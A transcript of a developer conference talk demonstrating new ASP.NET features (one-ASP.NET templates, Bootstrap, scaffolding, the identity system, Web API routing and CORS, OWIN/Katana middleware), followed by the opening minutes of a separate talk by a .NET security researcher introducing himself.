you're doing mostly web forms, but you might want to add an MVC controller, that's hard. That's a world of pain. Anyone do that? I've done talks on it and everyone's just kind of like, what are you doing? That's crazy. And so, you know, and then we've got all these other Lego blocks in the middle and hooking them all together is, starts to get tricky. So what we've done is kind of broken that apart. So instead, you can kind of pick off a menu. You can say, I'd mostly like, you know, the web forms template, but I also like a little bit of web API and a little bit of MVC. Okay? So we're going to take a look at that. And this is early. This is keep John up very late at night because the bits don't always completely work early. So the dialogue that you'll see here is not beautiful yet. It's going to get better. But so we do, when you do File New Project, this is what you see. Okay? So we have got just web application. Now, you've also got portable class library and that's actually going to be out of there too. That's going to be removed. So when you do File New Web, you're going to get web application. All right? That's it. So if you still need to be able to go in and create the older templates that, you know, if you're relying on older templates, they're still there. But that's kind of a, you need to go look for that. Okay? So generally, let's create a new, we'll start with a web forms project, mostly web forms, right? So this is what this is going to look like now. So now we've got this choice here where we can say, okay, do we want to go empty, web forms, MVC, web API, single page, Facebook or mobile, right? But you can also say, all right, I would like mostly web forms, but I'm also going to throw in MVC and, you know, maybe web API. Now, the more I check off on here, the bigger my project gets. It pulls in more new packages. It does more configuration and all that. But it does set all that stuff up for you and it wires it together and they all play nicely. Okay? So this is actually kind of this alone, this was a huge effort. There were a lot of people working on this. ASP.NET was never really designed for this from the beginning. I mean, there were modules and handlers and, you know, but mostly ASP.NET was kind of one thing, you know, and it kind of worked around web forms. And it's been this long process to move to, okay, you know, MVC kind of decouples a lot of things. And then as you see how things are working with web API and going forward, things are really kind of broken apart more. So this has taken a lot of work for the team to do this. Now, another thing in here is this configure authentication. So as I go through and set this up, all of them use the same authentication choices. So I can go and say, I can say, you know, no off, I'll take care of it myself. No off sounds kind of like a OAuth, except nobody can log in. I'm not sure. Then you have individual organizational Windows auth. So Windows auth is like, you know, your standard Windows auth. And then organizational, you can set up to authenticate, you know, with OAuth and things like that. So different providers. And again, this is all using the same identity stuff. So when you configure it for, you know, one of these projects and you've picked mostly web forms, but also some web API and MVC, they're all going to be working together with that same authentication. Does that make sense? All right. Checking on my time. Got lots packed in here. Okay, good. So then when I go through and click okay, it's your standard, you know, we'll create a project. So let us do that before I do that. Let me see. We'll unzoom and make you dizzy. I've got a few kind of bounce between slides and demos for a bit because I want to keep you up with where we are at, but most of this is demo-wise. So we have changed the File New Project templates for all the, you know, all the new templates are using Bootstrap now. What we had in the past was our own kind of, you know, everything was Microsoft written. And so a lot of effort went into that. But the problem was it was its own kind of separate thing, right? So for instance, recently web forms. Remember how web forms used, or MVC used to be like the ugly blue background and it had kind of a white box on it. And then it got rounded corners in three, I think. And then in four, they put a lot of work and rewrote the whole template and it was responsive and it used kind of modern, more modern layout in CSS and it had a workable reset in there. But it was still only Microsoft. So the problem is you can't really, there aren't a lot of resources out there just for like only MVC developers are writing MVC templates, right? And so there's not a way to take advantage of that whole ecosystem. So meanwhile, some guys, some folks on the Twitter team created something called Bootstrap. So who here's using Twitter Bootstrap? Okay, a lot of people, right? And it's, so it was Bootstrap, or it was Twitter Bootstrap and now those people have actually left Twitter and now it's just called Bootstrap. So I forget, so let me see Bootstrap. There it is. So what Bootstrap does for you is a few things. One, it gives, it has some, you know, kind of modern looking CSS. It has support for a lot of standard things that everyone has to implement themselves. For instance, if you go, it has things like headings and buttons and it can even get pretty complex with things like, say, progress bars, right? They have some animated progress bars and all kinds of things. They even have, well, they have badges, you know, colored badges. So things like that. Drop-down menus. Drop-down menus is great, right? So, and that's something that takes a lot of work to do well, you know, and so here like button drop-downs is an example, right? That takes a good amount of work to do yourself and then you end up cobbling a lot of things together. You find a jQuery plugin to do one thing, you find something else. So this is kind of, this is a well-maintained, actively built project and there is also an ecosystem out there that's doing other themes because a complaint for a while was every bootstrap site looked like a bootstrap site. It's very kind of noticeable what the design is. So there are things like this. So this is BootsWatch and you can see on here, they all still kind of have, you know, kind of similar big, big areas, hero areas at the top. They call them and buttons and things, but they really do have kind of different looks, okay? So when we go in here, we're back into this. Let's create our web forms and MVC app. So it's going to spin up and add in a bootstrap and, you know, pre-configure all that for us. All that CSS is pulled in, JavaScript, et cetera. What's that? Yeah, there's one in here. There's a few bootstrap Metro ones I've been looking at. There's one in here that's called Cosmo that's decent, but there's some really nice ones. Yeah. So, okay, so this has set up for us a, you know, final new experience. So let's go ahead and run this. And I'll show you one thing that we can do. My default browser right now is Chrome. I kind of rotate through them all on a regular basis, right? So here I could say I would like to launch this with Chrome and, oops, I'm doing this wrong. There is a way to multi-select. There it is, Browse with. So I can go in and I'd say when I launch, I would like to launch it with Chrome and Firefox and IE, right? And I can set the browser size. I'll set them all to, you know, 480 by, or whatever it is, 684. Wow, that's nice. You know, sometimes when it does this, it's just playing with you. Like you say cancel, I don't know that one. It really did go down. How do you crash like launching the browser? That's crazy. Okay, let's pretend that didn't happen. Okay, so. I do not want to attach. Okay, so. We'll start. That's more fun if I launch a few browsers, but if it does that to us again, we'll just go with one. And again, this is like not released. These are nightly build kind of things. I'll do IE and Chrome. We'll just start with those two. Okay. Great. So this is spinning up two browsers for us and we can see, you know, that they're looking the same, which is nice. So one nice thing that Bootstrap does that you might not think about is they have a sensible CSS reset that kind of changes, it removes, it changes the padding and differences that browsers have between them. It's not as bad anymore, but it used to be, you know, pretty significant changes. So I'm going to go in and tile. I'll just stack these up. Because I want to show you a cool feature that you may not have seen yet. I'm hoping you have not seen yet. Okay, so we've got two browsers and we're working away. And one keeps popping up. We won't let that get us down. I'm about to close you browser. All right, you're done. There we go. All right. So I can go in and I can edit these. Now, I may want to go in and, you know, I could, I can make HTML changes, but I want to do something a little bigger. I actually want to replace our Bootstrap theme. So we're looking at this Bootstrap. So let's go pick a different one out. So there is that metro looking one. I'm actually going to go with this one here. It's Amelia. Just because it looks, you know, significantly different. Actually, there's an even, there's a darker one here. Superhero. I'm feeling superhero today. Okay, good. So, see if I can mess this up. Superhero download. Okay, so I'm downloading that CSS. Now, the way everything's implemented, it's all CSS driven for the whole site, right? So I can pick that and just completely replace this CSS. Now, this is kind of, you know, how you do for a demo. I would change this. I would use bundling and I would hook it up that way. But I just want to show you quickly what this is able to do. So, we've got our browser here and then we've got IE over here and I'm going to shrink that back down. Go there. Okay. So now I want to save that CSS and I'm going to do reload. So do you see what happened there? I clicked this little reload button in the toolbar in Visual Studio and it refreshed both connected browsers. Okay. Which is pretty useful. What we shipped with Visual Studio 2012 was Page Inspector and Page Inspector has been getting a lot of like live update things. But this is actually updating multiple connected browsers as we type. Okay. So now I'll go in and I will, let's change that default page. We'll change some of that text on there. Right. So here it says ASP.net. I will say is neat. Okay. And I'm going to save with, I'm going to do control alt enter. Now, this will actually work across different things. We could connect, you know, mobile emulator. We could actually, anything that's connected to this, we'll get those updates. And the reason is Visual Studio is actually injecting using, it's injecting JavaScript that runs a SignalR hub. So we'll briefly talk about SignalR later. But this is, SignalR is important because it's not just one way communication, right? That would be good enough if it was just one way. But this is actually two way communication between the browser and Visual Studio. So we've done kind of the obvious thing first, which is push updates from Visual Studio out to the browser. But imagine a Visual Studio can watch what your browser is doing and say, hey, this page is taking too long to load or, you know, we've got a conflict in your JavaScript or whatever. It can monitor that. Right. Pretty cool. Come on. That's cool. If that's not cool, I'm done because okay. So there we are with our bootstrap. One other thing I want to show you with bootstrap is I have got the, actually, I'm going to go back to, okay. There I've gone back. But my page is blank because I've deleted everything. So I'm going to throw in, let me see, a button group. And it's going to have a button. Now this is too small. Let me zoom it up. But in primary. So what I'm typing in here is Zen code and I'm using bootstrap classes. And I'm going to, I can put in content with Zen coding. Okay. So I'm going to say, you know, monkey. Whenever, I don't know what word you use when you're coding, but if I just need a word, that's usually I'll use monkey. Okay. So now I hit tab. And what that did is Zen coding, and Zen coding actually pulled in using Visual Studio Web Essentials extension. So, but Zen coding lets you type CSS selector syntax, and it will then expand out to the HTML that would match that. And so then I can go and when I refresh this, it should update. And if it doesn't, we'll just pretend like it did. That's what I get. When I did this earlier, oh, it's not running now. When I did this earlier, I was, I was practicing this with MVC. So, but okay. So there I got a row of buttons. And I can, I can do all kinds of other things with this. So for instance, I'll do one more. I'll do pagination. So I'll do, so let me make this bigger. So what I'm doing here is these are descend these, these are child selectors. So I'm saying I want a pagination div. And inside that I want a UL. And inside that I want list items. And inside, and I want 10 list items. So li times 10. And inside that I want an anchor tag. And inside that anchor tag, I want to say item. And here I put the dollar sign. And so that dollar sign is the, the thing that's going in. And actually, I would like it to look a little better. So I'm going to put this inside a div that's hero unit. Okay, hero unit is what they use kind of for that box up at the top. So now I do that, I hit tab to expand it. Okay. So now there's that. Now if I hit control, all enter. That should update my connected browsers. Missing bootstrap CSS. Yeah, but that should be in the, oh yeah, you're right. But still that should be in the master page. That's what I get for skipping, skipping to the different one. Stay tuned because we'll be showing more of that later. Actually, I'll come back to this if I get time. The point that I want to show with this is that assuming you don't do something stupid like I just said, it's very easy to take advantage of all those selectors and do quite a bit. So let me get back to the bootstrap thing that I was showing. So the idea is that it's not just, at first I was kind of like so, so on bootstrap, I'll be honest. I thought that it was neat, but I didn't always like the way it looked. And then the themes kind of make up for that sum. But I still wasn't completely sure. But what's really kind of made me think that it's more useful is I can use kind of standard, I can use standard, you know, things for pagination, for instance. Some of these things that are take a while to set up. So you can use these components and use standard kind of sensible styles, CSS styles. Okay? Questions on that? That make sense? Okay. I would love to mess with this more, but I need to go on because I want to show you scaffolding. So what we've had in the past with scaffolding was kind of a mishmash. So we had, let me see if I can take this all the way back. That's what I should have done. Okay. So what we had in the past with, actually, oh well. What we had in the past with scaffolding was nothing for web forms. MVC had its own scaffolding. You could right click and scaffold around a controller. Web API had its own different kind of thing. We had some kind of extensibility for MVC. When we're looking at that with the whole idea of what can we do better with this one ASP.NET thing, we thought scaffolding was important. And in doing that, we wanted to do it right for all of these. So I'm going to stop this. I'm going to create a quick model. We'll take a look at that real quick. Okay. So I'm going to create a, you'll notice, File New Project, Web Forms application has a models folder. And, you know, that's handy for what I'm doing now, but it's also handy for what I showed you earlier with the strongly typed controls. Okay. So I'm going to create a person class. And how big do I have to zoom it for it to be readable? Is that good? Good. Okay. So now let's give this person a, you know, standard things. We'll give them an ID. We'll give them a, and we'll give them, what else? I guess an age. Okay. So standard kind of stuff. So now I'm going to right click in here and I'll say add what we've got in this. Let's see if I can zoom in. So there we've got scaffold, right? And so scaffold is kind of the standard thing that we're using for all of them. So it's not, you know, add, add controller, add this, add that. It's always add scaffold. So when I right click, I say right click add. Bring up my scaffolding dialogue. So now this dialogue, remember this is the whole one ASP.net thing. I can scaffold anything into this project. So I can scaffold, we've got all our standard MVC scaffolders. I could, you know, scaffold an MVC controller. And I can do an empty one or with any framework, all that stuff. But I can also do, down at the bottom, I've got web forms and I've got, I've got web API in the list too. So here I'm going to say add web forms. So this is similar to the, you know, to what we did. Did I build, there we go, person? Okay. So I'm just going through. I've selected my model classes person. I'm going to create a new entity context. I'm going to generate mobile views as well. And I will say add. So now it has me create a new context. So that's creating an entity framework context. You can use anything you want to get your data. I'm just showing that, you know, it works well with any, any framework. So there's an error. Okay. So some that might be because I haven't built. That's always what it is for me and MVC. We'll try that again. Add. That's over there. Okay, here we go. On the plus side, we've already got our entity context. So it's going to be that much faster. Where is it? I'll just create a new one. They're cheap. Okay. So, and I'm also generating mobile views. Let's see if this works. There we go. Okay. So this is going through and it's, you know, building out pages. So the same way that it would build out if this was MVC, it would build a controller and views. This is building out pages for me. So you can see on the right side, we've got all those pages. And these pages are pretty smartly done. These are actually taking advantage of dynamic data. So that's another one of these things. A long time ago, when everything was not one ASP.net, everything was all split up, we had dynamic data. Did anyone use, anyone here use dynamic data? Anyone use a few people? People that have used or do use dynamic data really like it. It's pretty powerful. You can point it at, you know, a data source and it scaffolds everything up and it does all kinds of great stuff by just inspecting your data. So this is leveraging that. Okay. So one nice feature of that dynamic data is actually that it's got these templates, field templates and entity templates. Now, if you look at these, these are going to seem pretty familiar to the kind of display templates you've got in MVC. And that's because MVC actually stole them from dynamic data a while ago. Okay. So this means you can go in and in your scaffolding, you can, you can, you can scaffold, you can change the way things are displayed. You can say every time there's a string, every time there's an image, I would like an alt tag, I would like whatever. Okay. So that's it for scaffolding. One other thing I do want to show is that we also have mobile in here somewhere. We've got mobile views. And we've got a view switcher. So that makes it so you can, you know, the person can say, thanks for the mobile view, but I'd actually like to see the desktop one and it'll cleanly switch back to that. Okay. So we are at scaffolding. Now I need to hurry on to identity. So I'm thinking, we've been doing web forms all this time. I think I'm going to switch over to a new MVC application. So we'll close solution. We'll get a new one. So again, identity is one of these things that we've kind of, we've had what we've had for a long time. We had the identity system that's been around for, in web forms, I'm not sure, I'm not even sure when that, I guess that was an ASP2 when that came out. So, so we, yeah, so we've had this identity system and it solved cases that really made sense back around 2005. You know, when you had users and they all had roles. And so you have these five users or administrators and everyone else is a standard user and everyone else is not authenticated. Right. But over time, that doesn't fit with things like OAuth, where we need to track different things about our user. Users don't have passwords when you're using OAuth. Users have claims. And now also ASP.net or.NET 4.5 itself is wired for claims. So Dominic explained this to me the other day, roles are just kind of yes or no. Is this user in a role? Yes or no. But a claim can do a lot more. Claim can be what is this user's email address? Claim can be, you know, any, it can be, you can think of it as a value instead of just a yes or no. So there's all these things that we would like identity to be able to do and, and, you know, the framework supports it and, and the web, people are using it, but it wasn't set up yet in ASP.net. Well, in, we had, we had a new simple membership provider that we shipped with the last kind of wave of stuff. And it did simplify some things, but there were, there were still problems you could run into. For instance, it, you know, it wasn't completely testable. It wasn't very extensible. You could, you could use it to save additional information about your user, but you couldn't hook it up with other kind of providers. You couldn't change too much about how it worked. So we've, we've got what we think is, you know, kind of the identity system that we can use across all of these, you know, across Web API and MVC, you know, across the whole gamut. And it's, it's extensible and it's testable and it's kind of put a lot of effort into engineering something that is, you know, very future-proof and easy to work with. Okay. So I'm going to create an MVC app, create, I'll configure authentication. So I'm going to say individual user account. It's a new laptop for me and I'm not sure what it's doing. Okay. So I click okay and nothing happens. All right. I'll just do that. Okay. So, so now it's going through and it's wiring everything up. I can talk more while it's installing all the new packages and stuff. One other thing that, that's different about the identity system is it's wired up using Owen. So Owen is open web interfaces for.NET. We'll talk a little bit more about that later given time. But it's kind of wired up in a way that is not even strictly coupled to ASP.NET. So that means you could use, use this identity system, you know, it works very well with ASP.NET. It's designed to work well with ASP.NET. But it's also designed so that you could take it and use it with Nancy or service stack or anything else, right? So it's, it's kind of loosely coupled now. It's not wired in so deeply to ASP.NET. So what I want to show you with this is we've got an identity model. The identity model is what defines our user. And what's nice with this is that this is set up in, you know, it's a plain old CLR object. And so it can be managed by NAD framework. So this is another one of those things. Given time, I do a different demo where I go through and use NAD framework migrations and keep changing my user and keep migrating the data along with that, which is something that would be very, very hard to do with our older systems. So here I've got, you know, an ID and a username. I'm going to throw a few other properties on them. So let's give them a, just an age, I guess. Nickname first. Okay. So in the past, if you wanted to bolt additional properties onto a user, it was, it was not very easy. We gave you, like, you know, kind of a blob of, blob string you could throw things onto. Or a lot of time people just said that's too hard and they had a separate database and they wired them together by tracking the IDs. Simple membership gave you some opportunities to extend things, but it kind of, it was kind of wired in specific ways. So what this is doing, this is saving these. This is going to, you know, build up a user database for me using the user's properties. So I'm going to hit a five. And you're going to register a user and then we'll see what happens to them. Now notice this. This is what this looks. This is, you know, our site when it's at this size. Now when I make it bigger, so it went to a full screen view. So this is this responsive layout. This is the kind of thing that makes your app look good on a mobile phone and good on desktop without you having to work hard. Okay. So now let's register a user. So we will register Freddy. Freddy. And his password is not telling. Okay. But it was spaghetti. Okay. So I just hit register. Now as it's doing that, let's go over and view all our files. So here's the database that's been created. And actually, I didn't do everything that I needed to do. So you'll get to see how I fix problem. Yeah, actually, okay. So there it is username and nickname and stuff. Now normally what I would do is I could go into however that user is created. So I would go into the account controller and I could say on create account, you know, we actually want to fill in a nickname and pull it out of something. Right. So if I go into register, this is where I would set like the age and nickname. But what it did was it said, well, those are empty, but I'm going to create those fields for you. So if we look at what's in our database. So there we have those fields. Okay. And this is something where we can do all migrations. We can, you know, we can treat it like it's code accessing data. It's not this weird kind of thing that's kind of away from us. All right. There's a lot more to it. And there's a lot more future plans to make it, you know, more extensible, make it so that you can bolt things on, et cetera. But it's been designed from the beginning that it's very pluggable. One other thing I want to show is what I'd mentioned with the way that it's configured. So if we go into app start, here we have startup auth. And so startup auth has, you know, the things where it wires everything together. And, okay. So this is, this has a lot of stuff you can uncomment if you want to do more. But this is really all there is to it. What's different about this, though, is there's nowhere in the application where it's, you know, it's calling out to this. This is actually using the OIN system. So it's got this IAP builder. So actually, depending on time, let me see, 11.05, okay, 15 minutes. I'm going to run through a few things and then hopefully get back to that OIN because that's my favorite demo. Okay. So that, we just talked about identity and, you know, how we've changed the identity system and also how that flows across all the different systems now. It's the same identity system. Skaffling, we talked about identity. No, that's really kind of more of like an implementation detail of, you know, how the auth is happening. This is more about the identity, how it's stored and what's kind of calling down into OAuth. So that might open on. Okay. So MVC 5, there's not really, you know, a whole bunch of feature-wise, but remember we just shipped ASP.NET 2012.2 in February and that had tons of new templates and things. The real work that was done on MVC was making it so it's not its own thing. So now there isn't that separate special project type GUID that, you know, has to be associated with your project to get that MVC tooling. Now you can do, you know, it can be added easily into any web application. So you can do an empty web app and then you can easily hook up, you know, MVC controllers. One thing to pay attention to is that this and pretty much everything we're talking about in, you know, in the future here is requiring 4 or 5. One thing with that is async. There's a huge focus on everything supporting async. So you'll see async, you know, throughout the pipeline. And so that's one reason for that. Web API 2. There are a lot of features. There's a lot of activity going on with Web API partly because it's brand new and partly because there, you know, a lot of people are using it and have real needs for what their service needs to support. And so we're adding them in at a frantic rate. One thing that allows us to do that is that we're able, it's a fully open source project. It's not open source code, meaning that it's just open under an open source license. But it's actually an open source project so we can take contributions from the community. So two things that I'm going to show you are, and, you know, there's a lot of great stuff on this list I'm not going to show you, but OData support, a lot of work around OData. So if you do like OData, you can do a lot around querying. So you can make a very simple controller method or controller action that just exposes your data and exposes it using OData syntax. And so then your clients can go in and say, I would like customers, but I would like to sort them by this and filter by this and I'd like only the top five. And you don't have to write a bunch of controller actions to handle that. So that's OData. Portable HTTP client is, you know, part of this whole effort and the portable HTTP client works all over the place, phone and Windows Store apps and everything. So allowing you to call into your web APIs from other places. But what I'm going to show you is two things, attribute routing and core support. So first of all, attribute routing is another way that you can do, that you can configure your routing URLs. So what this allows us to do, I'm really just kind of going to illustrate how they're set up. Okay. So you can still configure routes the way you did, the way you used to. But you can also, that's awesome. All right, well, we'll just look at this code and we'll assume it was going to compile. So this is your own? No. Well, so the question here is this is our own implementation and not the existing plugin. This is attribute routing was first written by Tim McCall and you know, it was a popular NuGet package. So what they did, the two things I'm going to show, core support was pretty much just pulled in more as a NuGet package. And a lot of things we do, we just will say, hey, do you want to contribute this? You know, can we support this as a NuGet package? And everyone says yes, and we just pull it in. That's how.NET OpenOff worked. What they did with attribute routing is actually like they worked very closely with Tim McCall, but it was kind of, it was adopted, so it was adapted so it would work really well with Web API and went through all the code review and you know, performance testing and all that stuff. So. Yes. Yeah, yeah. Yeah, so all these attributes here, then you can go in and you can say, yeah. So here's HTTP get and you know, we can bind to things. You can do all kinds of things like here I've got a route prefix. So I don't have to say order ID approve, order ID and all that. Everything in this controller is assumed to have order as a prefix. So that's a very simple case. Versioning controllers is another thing where you can go through, let's say we have a customer and they just had an integer ID. And then later we go on and we change our customer so they have a GUID ID. And we need to support both of those, right? So what we're able to do with this is we can get, we can use a route prefix and we can say if somebody calls the API with V1, you know, then we'll go through and we'll do our work using an ID, an ID. If somebody calls with V2, you know, then we'll call in using a GUID. So this is a way to support multiple versions and then our code under the hood is going to, you know, route things to our services. But it makes it a lot easier. Otherwise in the past you'd have to, you know, probably create different controllers or have extra logic in. So this makes this very simple. Two more neat things. One is nested controllers. So let's say we have a movie database, right? And we want people, of course, to be able to browse for movies and get a list of movies. But then let's say we also want people to browse for actors and see all the movies that that actor was in. So normally you'd end up with, you know, probably an actor controller and then it would have a movies action and then that movies action would call into a service that was shared, but it's kind of a lot more work. So instead we can just using attribute routing, we can say, all right, we're just going to say when people call into actors ID movies, we'll just call get movies by actor. So this allows us to have our concerns all in one place. This controller is concerned with movies, right? So we can, you know, keep that all together, but we can support the different consumers. And again here we've got by director. Does that make sense? I know I'm going fast. I've got a lot I want to get through. I have one other here with route constraints. So here we've got, you know, an ID. So we're constraining it to an integer ID. All right. So there's a lot more to this and it's really cool to be able to see, you know, how quickly after they said, well, we're going to accept code contributions, how quickly that has been going. So I want to show one other thing here then which is core support. So cores is cross origin resource sharing. And what that allows you to do is access one API from another URL. Oops, I just opened the wrong one again. So let's say I've got one web API and I want a different website to be able to call into that from JavaScript. The problem is that browsers will block that because it's a big security hazard. If you've got one browser that's able to call into, you know, any arbitrary URL via JavaScript, it could be sending, you know, information in the page. It could be sending passwords or cookies or things like that. So projects and we want cores. There we go. All right. So I've got a project here. Let me make sure it's the right one. Yeah. Okay. So I've got a project with two web APIs. In one of them, one is going to try and call into the second. Okay. So these are running on port 3000 and 3001. So one of the things that was included in the 2012.2 release was support for help pages. So here if I go into the help page, I've got this test API. All right. This is actually another thing that they made available as a new get package that drops right into the help pages. So these help pages are cool because they actually inspect your at runtime, they inspect your web API, look at all your controllers, figure out what the methods return, look at the classes, they generate all this for you. So now I'm going to say, all right, get values. And this succeeds, it's able to call because it's JavaScript in the page calling back to the server that served it up. But now if instead I wanted to call into the same service running on 30001. So localhost. What's that? You can change. Yeah, this will. Yeah, this is really handy. Okay. So now I'm going to call in. So I get an exception. And the reason is because it's blocked by the browser. Browser says that is not allowed. Okay. So let's see. Did I run that with? Okay. So now we've got, we can go in and say enable core support. So there's a few things we can do. One is I can say, this is the first is the simplest case. I can say allow any URL to call in and pass any header and use any verb. So that's star, star, star. Okay. Okay. Instead, I'm going to say allow any, you know, allow people to call in from any URL, but I'm only going to accept two headers. They can't pass me any header they want. And I'm only going to accept a get verb. Okay. So that's, this is going in my second web app that is going to allow core support, it's going to allow cross origin access from the first browser. Okay. So now I'm going to go, I'm on 3000. See if this works. Okay. So I'm going to go to 3000. Okay. All right. So that's able to make the call now. Right. But let's try and add in some crazy header. So I'm going to add in X foo and it's going to ask for some spaghetti. All right. So that's blocked. But now I, if you remember in my code, I had said I will allow the XNDC header. Right. So I'm going to go in and say this is now XNDC. And that succeeds. All right. So this is the kind of thing where if you haven't run into this, you're wondering why anyone would care about this. If you have run into this, this is a lifesaver. It's really hard to be able to call in from one server to another server via JavaScript. From one web page, served off one domain to another domain over JavaScript. So this is all set up. And that was done because of another open source library that someone else contributed. All right. So tons of other great stuff in web API. I, you know, can't dig into any more of it, but it is very awesome. SignalR 2.0. One of the big things that there's a talk later today on that from the people that build SignalR. So I have neither the time nor the wisdom to try and match that. But one of the things they've added is again support for, for Owen working towards that. So I've been talking about Owen and Katana this whole time. And let's see where we're at. I have like two minutes to show it, which is awesome. Okay. So here's how, this is the problem that Owen and Katana solve. In the past, you would write some code and it would kind of be hosted inside of ASP.net and it would run on top of IAS. So everything kind of assumed your application, if you wanted to extend it, well, you can write modules and handlers. You can work with ASP.net and that's about all you can do. Which works in a lot of cases, but we don't know about the other cases because we don't even think about them. So what Owen and Katana did was break everything apart. So each of these layers can talk to each other via a simple delegate. So the host, so for instance, the application can make calls into the middleware. Passing, it passes a dictionary, which includes the application state, and it returns a task. So the way that any Owen component plugs into another one is it has a function, it receives a dictionary that has application state and returns a task. So the idea is if you want to talk to me, you say, okay, we're a web app. Here's what's going on. Here's the package. It's got, you know, all the headers. It's got the URL. It's got, you know, all the state of the app up till now. You give me back a task. The task is just a promise that when I'm done with my work and everyone else down the chain is done with their work, I'm going to feed that information back up to you. Okay? So it's a whole async chain. The reason that I've got all these lines there on middleware is this is, there's a lot of great features that this enables. One being that it can be really fast, very lightweight compared to ASP.net, traditional ASP.net, which kind of had to support everything that web forms did all the way back to 1.0. But also middleware can be very pluggable. So I can plug in all different kinds of middleware components that can do different things. So let's look at one of those. And that will be my last demo. Okay, so. So what I did is I create, come on now, stop. Shift F5. What I did for this demo is I went File New Project. If you go onto the ASP.net site and search for Katana, K-A-T-A-N-A, there's a whole white paper that tells you all the different things you can do with Katana and how to get started. So I followed one of those. I created a new empty web application. I pulled in two new get packages that make it easier to write, you know, owing components. So this is my entire website. Thank you. All right. That's because. There we go. Okay. So I have this app builder. You may remember I showed that before in the identity thing. So it receives a, you know, it sets up this delegate here for the async handler. And then it's going to return and notice all the async in there. Everything's wired up async. So this is all I have to do. I say my response is HTML and it's going to write some content to it. All right. But now I want to hook in some middleware. So if I hit F5 on this, you would see, you know, a web page and it would say hello, NDC. Not all that exciting. But this is an entire web app. There's nothing else. There's not all kinds of handlers and all that sort of stuff. This is all that there is. Okay. So now in my little surprises region, I've set up a few middleware things. And also a link to where you can find out some more middleware. So I've created two. One is a logger and the other is a copywriter. A copywriter just puts copyright after everything on the page. So I want to protect that stuff. Okay. So let's, yeah, you're right. A rigter. Okay. So let's first we've got, this is my logger. So remember I said that the important signature here is this. Don't get too worried. This looks like a lot. But basically this first chunk says give me the application state. And you can dig into that and get stuff out. And I will, this whole thing, and I will return you a task. Okay. So when people call in, this is what they do. So when people call, excuse me, this is the one I should have done. So people call invoke and they, and you return them a task. So this one just says, all right, I'm going to log. And then I'm going to delegate to the next thing in the chain. And then I'm going to log again. Start and end. All right. So that's all there is to this one. Then I'll show you one more. This is my copy, copy rigter. So all this does is when we call invoke, we pass it the state of the application. And, and it returns a task. So this one says, okay, I'm going to delegate all the way down the chain. Everybody else do your thing and write out what you're going to write. But I am going to get the response. And I'm going to call write async on the response. And I'm going to write out the copyright sign. This is HTML encoded. So the idea is, you know, this is very simple, a few lines of code example. But if you think about it, this can be doing a lot of other things. This middleware can be plugging in things like, okay. So that, oh, so there's the copyright sign. And then if we look into here, there's our logging, okay. So the idea of this middleware is something that I think could be really interesting. If you look at other web frameworks, you know, there's Rack, there's, what is it, PSGI. So there's all these different things that in other web frameworks have, people have done all kinds of crazy things with. I'm thinking that people could do, you know, in addition to like plugging in with logging and that sort of things, they could also be doing image optimization at a different, you know, at a different level. They could be doing, you know, response modification, all kinds of things. So this is very early on, but it's bleeding edge. And I want to show you that. So we are four minutes over. So let me just wrap up. All right. There. Okay. So first we talked about that 2012.2 release and what's in the update 2. We talked about all this stuff. You're going to hear a lot more about all of these things that build just a few weeks from now. So, you know, we talked about the one ASP.net, the new tooling that supports that showed how the new bootstrap templates make it easier to style and theme things. Scaffolding, a new scaffolding system that works across all of them, Web API and MVC and Web forums, everybody. A new identity system. I didn't talk at all about SignalR2. MVC5, you know, is really the main work in MVC5 is that it plays well with everybody and it's not off in the corner, you know, feeling smug. Web API, I showed you cores and attribute routing and then also there are a lot of other features like OData. And then finally we looked at Katana at the end. Finally, I just want to say you can play along at home. We make our roadmap public. You actually, if you go to ASP.netwebstack.coplex.com, you can see the check-ins as they happen. Okay. So if we, there we go. So you can see, you know, if people are working hard, you can see what they're working on. So let's see. Okay. So check in Thursday at 2.03 p.m. Did you know about this? You can also pull all this code down via nightly NuGet packages. So that's how I did some of these demos. I mean, some of this I did via, you know, Visual Studio 2013 pre-release, but some of these I did just using nightly NuGet packages. So there's a whole community writing blog post about all this stuff based on just watching the code as it's checked in, pulling the NuGet packages and putting it to work. I'm out of time. Thank you.
|
Find out what's new and next for ASP.NET developers, including SignalR, new features for ASP.NET Web API, new ASP.NET MVC templates for Facebook apps and Single Page Applications, get a look at the latest web tools for Visual Studio, and more.
|
10.5446/51448 (DOI)
|
I'll just talk for a little bit why everyone settles in. I'm a hacker I guess but more so I found some really cool things in code. I started out as a core developer and fell into the world of security. I think the word hacker is most appropriate but in developer circles I would more say other normal terms like ninja or something else but what it really comes down to is there are things you can do in code that aren't possible. There's like three seats up there. Good luck. When I first got into programming I did engineering, I did the standard interior architecture OOP and that was my core. I thought when you wanted to share memory between two processes you did shared memory DLL mapping. I thought when you wanted to access someone else's program you used an API and that was just the world I lived in. I fell into security where that's not necessarily the truth. I would equate it to something like a computer or something like being a firefighter. If there's a locked room somewhere and someone's trapped in it and the room building is on fire you can go into that room. You have specialized tools that can cut through steel doors. You have access to basically the entire world. That's pretty much what I see security being that the truth is you have complete access over everything. I'm going to do two speeches. The first one I'm going to talk about how I got here and explain a little bit of what I do and who I am. The second speech I'm going to just go into code and I'm just going to focus on what I do on a daily basis, the actual lines of code that I use to attack. I'm John McCoy and I work under digital body guard. This is where you can find research, tools, papers. I basically put out everything that I'm showing you for free. I usually hold back some of my stuff for a year or two and so what you're seeing today is mostly stuff that I've held back, well in the second speech you'll be seeing stuff that I held back for a couple of years now. I try and get back to the community as much as possible. I get paid for securing people. I don't get paid for making security tools. That kind of comes out in my background. I started out in C++ just as a core developer. I eventually graduated up to MFC and founded horrendous. I was like, I need to do something else. I'm like, Java, that's cool, people do that. Then I found.NET. After seeing.NET, I just clicked with the language. It was the first time that I had ever just natively picked it up and everything made sense to me. It was still back in beta. It was still back when.NET was coming out 1.1. It was still for the most part completely unknown. I wanted to know more and more. I eventually found schools that would not teach me.NET because they didn't really have much.NET knowledge, but schools that would allow me to do.NET. I had to settle for a C++ school that would allow me to do.NET. This actually turned out to be one of the best things that I ever did is going to a C++ school and learning.NET. I eventually fell into security. From security, I fell into just pure research. What is in the CLR? What's in that place that we just put on the map, Dragons? That's what led me to doing application security reviews, pen testing, defending companies and software against hackers, doing development and support, specifically in the security arena. After living in security, I'm also here to give a little bit of just security fitness for the average developer. After living in security, what's easy that you can do on a daily basis that will help protect you? What I love about.NET, there's a VM. It's abstracted. It's this meta language. It's event driven. It's extendable. It's free and open. It makes the previous languages to me look sloppy. Why.NET sucks? If you search for it, especially back when I first started, 1.1 days, going and typing in.NET or.NET code was the most painful thing. Search engines would convert C sharp to C. There were multiple examples in different languages, specifically because when.NET came out, it was mainly just corporate examples. Most people 